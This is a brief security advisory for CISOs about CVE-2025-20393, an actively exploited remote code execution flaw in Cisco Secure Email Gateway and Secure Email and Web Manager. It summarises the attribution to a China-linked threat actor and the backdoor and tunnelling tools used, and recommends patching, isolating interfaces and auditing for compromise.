What happened
A critical zero-day remote code execution vulnerability in Cisco Secure Email Gateway and Secure Email and Web Manager appliances has been actively exploited since November 2025. Tracked as CVE-2025-20393, the flaw allows unauthenticated attackers to execute root-level commands via crafted HTTP requests targeting the Spam Quarantine feature. Cisco Talos researchers attribute the attacks to the China-linked advanced persistent threat actor UAT-9686 (UNC-9686), noting tooling overlaps with APT41 and UNC5174. The threat actors deployed a Python-based backdoor, AquaShell, along with AquaTunnel and Chisel for lateral movement, and AquaPurge to remove logs. Exploitation focused on espionage in telecommunications and critical infrastructure sectors, with attackers gaining persistent access and internal pivoting capabilities. CISA added the CVE to its Known Exploited Vulnerabilities catalog in December 2025.
Who is affected
Organizations using affected Cisco Secure Email Gateway and Secure Email and Web Manager appliances are directly exposed if Spam Quarantine is enabled and internet-facing. Indirect exposure may include networks connected to compromised appliances.
Why CISOs should care
Zero-day exploitation in core email security appliances can compromise enterprise communications, provide persistent attacker footholds, and enable lateral movement into sensitive internal systems, increasing risk of espionage and operational disruption.
3 practical actions
- Apply Cisco patches immediately: Upgrade appliances to the fixed releases and verify Spam Quarantine configuration.
- Isolate vulnerable interfaces: Firewall management ports and separate mail/administration interfaces from internet access.
- Audit for compromise indicators: Check for AquaShell persistence, reverse SSH tunnels, and log-wiping activity using TAC guidance.